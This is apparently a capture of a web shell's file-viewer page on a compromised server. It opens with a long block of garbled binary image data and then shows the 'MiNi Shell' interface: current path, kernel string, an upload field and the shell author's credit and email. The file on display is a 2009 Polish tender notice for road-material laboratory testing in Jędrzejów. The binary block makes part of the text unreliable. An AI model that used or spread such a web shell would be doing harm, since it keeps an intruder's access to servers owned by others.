JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090122/24785-N-2009.html

<p class="kh_header"><b>Jędrzejów: OBSŁUGA LABORATORYJNA W 2009 ROKU</b><br>
<b>Numer ogłoszenia: 24785 - 2009; data zamieszczenia: 22.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Stefana Okrzei 83, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 041 3861426, faks 041 3861171.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedrzejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA LABORATORYJNA W 2009 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres powyższych badań obejmuje:
            4.1.1. Badanie materiałów i sprawdzenie receptury:
                  -   badanie materiałów i orzeczenie o jakości (wypełniacz, piasek, kruszywo 0/4 mm, 
                       2 frakcje grysów) użytych do wykonania mieszanki mineralno-bitumicznej
                       w trakcie wykonywania nawierzchni - przewidywana ilość badań wynosi 10 badań
                -     sprawdzenie zgodności receptury laboratoryjnej ze SST dla warstw mineralno-
                       bitumicznych - przewidywana ilość badań wynosi 10 badań
              -     badanie kruszywa łamanego dwóch frakcji grysów - przewidywana ilość 10 prób
                        Badanie to ma obejmować:
a/ zawartość zanieczyszczeń organicznych
b/ zawartość zanieczyszczeń obcych
c/ analiza sitowa
d/ zawartość ziaren nieforemnych
e/ orzeczenie o jakości


         4.1.2. Badania do odbioru robót:
                    -  badanie składu mieszanki mineralno-asfaltowej - przewidywana ilość wynosi 
                        70 prób
                  -    stabilność i odkształcenie wg Marschalla - przewidywana ilość wynosi 120 serii
                  -    grubość warstwy, wskaźnik zagęszczenia, próżnia, skład mieszanki -       
                        przewidywana ilość wynosi 170 prób 
                  -    pomiar równości podłużnej planografem lub metodą  równoważną- przewidywana 
                        ilość wynosi 35 km
       4.1.3.  Opracowanie opinii technologicznej   - przewidywana ilość wynosi 70 szt.
       4.1.4.  Wykonywanie pomiarów równości w terenie - dojazd z Jędrzejowa na budowę
                   -    przewidywana ilość km dojazdu na budowę wynosi   1 500 km.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.2.1. Potencjał techniczny


                  Wykonawca musi wykazać, że dysponuje lub będzie dysponował laboratorium 
                  Wyposażone w sprzęt niezbędny do wykonania  przedmiotu zamówienia.

  6.2.1a Potencjał techniczny Wykonawców wspólnie ubiegających się o udzielenie 
             Zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą 
             wykazać, że łącznie spełniają warunek określony w pkt. 6.2.1.
       
      6.2.2. Doświadczenie

                Wykonawca musi wykazać, że wykonywał, a w przypadku świadczeń okresowych lub 
                ciągłych również wykonuje, usługi w okresie ostatnich trzech lat przed wszczęciem 
                postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
                krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom 
                stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat 
                wykonania oraz załączyć dokumenty potwierdzające, ze te usługi zostały wykonane 
                należycie.

	6.2.2a. Doświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia
               Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą 
                wykazać, że warunek określony w pkt. 6.2.2. spełniają łącznie.

6.3. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu

       Ocena spełniania warunków udziału w postępowaniu:  spełnia/nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.1. Do oferty Wykonawcy są zobowiązani załączyć:
7.1.1. druk OFERTA zgodnie z formularzem stanowiącym Zał. Nr 1 do SIWZ oraz 
          druk FORMULARZ CENOWY stanowiący Zał. Nr 1a do SIWZ;
7.1.2. oświadczenie o spełnianiu warunków określonych w art. 22, ust. 1 Ustawy, stanowiące    
         Zał. Nr 2
7.1.3. projekt umowy podpisany i uzupełniony o merytoryczną treść w punktach dot. danych 
          wykonawcy, stanowiący, załącznik nr 3; 
7.1.4.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
           ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
           rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie    
           wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
      7.1.5. aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego    
                oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia    
                Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem 
                podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,  lub 
                zaświadczeń, że uzyskał przewidziane prawem zwolnienie,  odroczenie lub rozłożenie 
                na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
                organu-wystawionych nie wcześniej niż 3 miesiące przed upływem terminu 
                składania ofert;
      7.1.6. wykaz niezbędnych do wykonania narzędzi i urządzeń, którymi dysponuje lub będzie 
               dysponował wykonawca, załącznik nr 4
                /w przypadku gdy wykonawca w wykazie stanowiącym załącznik nr 4 wskazał 
                 narzędzia i urządzenia, którymi będzie dysponował, dołączy do oferty  pisemne 
                 zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania 
                zamówienia narządzi i urządzeń/
      7.1.7.  wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia 
                Postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia  działalności jest 
                krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom 
                stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania 
                i odbiorców oraz dołączyć dokumenty potwierdzające, że te usługi zostały wykonane 
               należycie, załącznik nr 5.                 
7.1.8.	W przypadku gdy oferenta reprezentuje pełnomocnik, do oferty musi być załączone     
            pełnomocnictwo posiadające jego zakres i podpisane przez osoby uprawnione do
            reprezentowania oferenta..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jedrzejow.finn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, ul. Okrzei 83, 28-300 Jędrzejów, dział zamówień publicznych, pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 09:45, miejsce: Zarząd Dróg Powiatowych, ul. Okrzei 83, 28-300 Jędrzejów, dział zamówień publicznych, pok. nr 4 /nie sekretariat/.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com